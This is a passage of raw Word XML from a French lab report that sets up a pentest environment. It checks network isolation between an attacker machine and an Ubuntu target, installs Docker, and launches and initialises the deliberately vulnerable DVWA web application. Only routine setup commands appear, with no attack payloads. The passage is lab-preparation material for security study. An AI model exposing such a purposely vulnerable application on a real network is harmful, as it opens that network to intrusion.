        <w:t>La commande doit impérativement retourner une erreur.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A96198" w14:paraId="7B42777B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0AF53016" w14:textId="77777777" w:rsidR="00A96198" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ping -c 3 8.8.8.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FEEB26E" w14:textId="3C889EA2" w:rsidR="00A96198" w:rsidRDefault="00491FD1" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00491FD1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="603A7DFF" wp14:editId="1D6C51B9">
            <wp:extent cx="5943600" cy="2081530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1262584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84117" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2081530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEB060B" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>À l'inverse, l'interconnexion interne directe entre l'attaquant et la cible est validée par requêtes ICMP.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A96198" w:rsidRPr="00DD5771" w14:paraId="318692DD" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="45538E4A" w14:textId="1964630D" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00491FD1" w:rsidP="00EA3F4B">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD5771">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Ping</w:t>
            </w:r>
            <w:r w:rsidR="00000000" w:rsidRPr="00DD5771">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> -c 3 &lt;IP_DE_LA_CIBLE_UBUNTU&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12BCE3EE" w14:textId="52CF3D5C" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00491FD1" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00491FD1">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7371C13E" wp14:editId="6E0F6B05">
            <wp:extent cx="4867954" cy="2057687"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="770542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42411" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4867954" cy="2057687"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC504A8" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="18" w:space="4" w:color="1A365D"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="1A365D"/>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. DÉPLOIEMENT DE L'APPLICATION VULNÉRABLE (DVWA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D50A0DC" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Pour instancier notre cible sans modifier les dépendances système de la machine hôte, nous exploitons la technologie de conteneurisation Docker. L'application retenue est DVWA (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Damn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Vulnerable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Application).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7937ED43" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.1 Installation du moteur Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71961F45" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Sur la machine cible Ubuntu (nécessitant temporairement un basculement de carte en mode NAT pour récupérer les paquets), nous installons le démon Docker :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ED7F82" w14:textId="77777777" w:rsidR="008747F5" w:rsidRDefault="008747F5" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B4AF501" w14:textId="77777777" w:rsidR="008747F5" w:rsidRDefault="008747F5" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33AE1D5B" w14:textId="77777777" w:rsidR="008747F5" w:rsidRDefault="008747F5" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="203AE96F" w14:textId="77777777" w:rsidR="008747F5" w:rsidRDefault="008747F5" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpYSpec="top"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="008747F5" w14:paraId="0A6D85E4" w14:textId="77777777" w:rsidTr="008747F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="16C47948" w14:textId="77777777" w:rsidR="008747F5" w:rsidRDefault="008747F5" w:rsidP="00EA3F4B">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt update &amp;&amp; sudo apt install docker.io -y</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:br/>
              <w:t>sudo systemctl enable --now docker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73D9AF14" w14:textId="77777777" w:rsidR="008747F5" w:rsidRPr="008747F5" w:rsidRDefault="008747F5" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB1EE3D" w14:textId="77777777" w:rsidR="008747F5" w:rsidRPr="008747F5" w:rsidRDefault="008747F5" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD2F59F" w14:textId="77777777" w:rsidR="008747F5" w:rsidRPr="008747F5" w:rsidRDefault="008747F5" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20A4B938" w14:textId="77777777" w:rsidR="008747F5" w:rsidRPr="008747F5" w:rsidRDefault="008747F5" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A8B560B" w14:textId="77777777" w:rsidR="008747F5" w:rsidRPr="008747F5" w:rsidRDefault="008747F5" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2172E2FA" w14:textId="2E70D4B1" w:rsidR="008747F5" w:rsidRDefault="008747F5" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008747F5">
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E6FC8AF" wp14:editId="36C41AC4">
            <wp:extent cx="5943600" cy="639445"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="11555123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39445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0CCA10" w14:textId="77777777" w:rsidR="008747F5" w:rsidRDefault="008747F5" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="396A1303" w14:textId="77777777" w:rsidR="008747F5" w:rsidRPr="008747F5" w:rsidRDefault="008747F5" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-TG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68D5C3CA" w14:textId="77777777" w:rsidR="008747F5" w:rsidRDefault="008747F5" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BC51730" wp14:editId="0917DC59">
            <wp:extent cx="6623050" cy="4359282"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3175"/>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4685" cy="4360358"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A035D69" w14:textId="77777777" w:rsidR="00A96198" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B630533" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.2 Lancement du conteneur applicatif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CB3F69" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Nous instancions le conteneur DVWA en redirigeant le trafic du port 80 de l'hôte vers le port 80 interne du conteneur. L'option '--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>rm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>' garantit le nettoyage à l'arrêt du conteneur.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A96198" w14:paraId="6B9A28F7" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="604C565D" w14:textId="77777777" w:rsidR="00A96198" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> docker run --rm -d -p 80:80 vulnerables/web-dvwa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6CEA5BA8" w14:textId="77777777" w:rsidR="008747F5" w:rsidRDefault="008747F5" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D2C7FCA" wp14:editId="4B76A3C0">
            <wp:extent cx="6267450" cy="1992679"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>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2996" cy="2000801"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A02B16B" w14:textId="07F569D9" w:rsidR="00A96198" w:rsidRPr="008747F5" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Après le déploiement, nous basculons de nouveau la machine cible sur son réseau étanche Host-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>only</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> et vérifions l'état d'écoute des processus Docker :</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A96198" w14:paraId="43E2A2F9" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="445D21B3" w14:textId="77777777" w:rsidR="00A96198" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> docker </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282C34"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48080E5A" w14:textId="2510F047" w:rsidR="008747F5" w:rsidRDefault="008747F5" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6888245B" w14:textId="7E8B0D4F" w:rsidR="008747F5" w:rsidRDefault="008747F5" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="378A839D" wp14:editId="6DF5A849">
            <wp:extent cx="6849208" cy="494665"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635"/>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23645" cy="500041"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ABE8FE" w14:textId="1849F6A7" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3.3 Initialisation applicative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79163435" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Depuis le navigateur web de la machine attaquante, nous interfaçons la mire HTTP. Pour rendre l'application pleinement opérationnelle, l'initialisation de la base de données SQL interne est obligatoire via la page dédiée `/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>setup.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DDD096" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D9BC06" w14:textId="77777777" w:rsidR="00B50FCE" w:rsidRDefault="00B50FCE" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B50FCE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="798493ED" wp14:editId="215BEB60">
            <wp:extent cx="2717922" cy="3140710"/>
            <wp:effectExtent l="0" t="0" r="6350" b="2540"/>
            <wp:docPr id="167604666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2401" cy="3145886"/>
                    </a:xfrm>
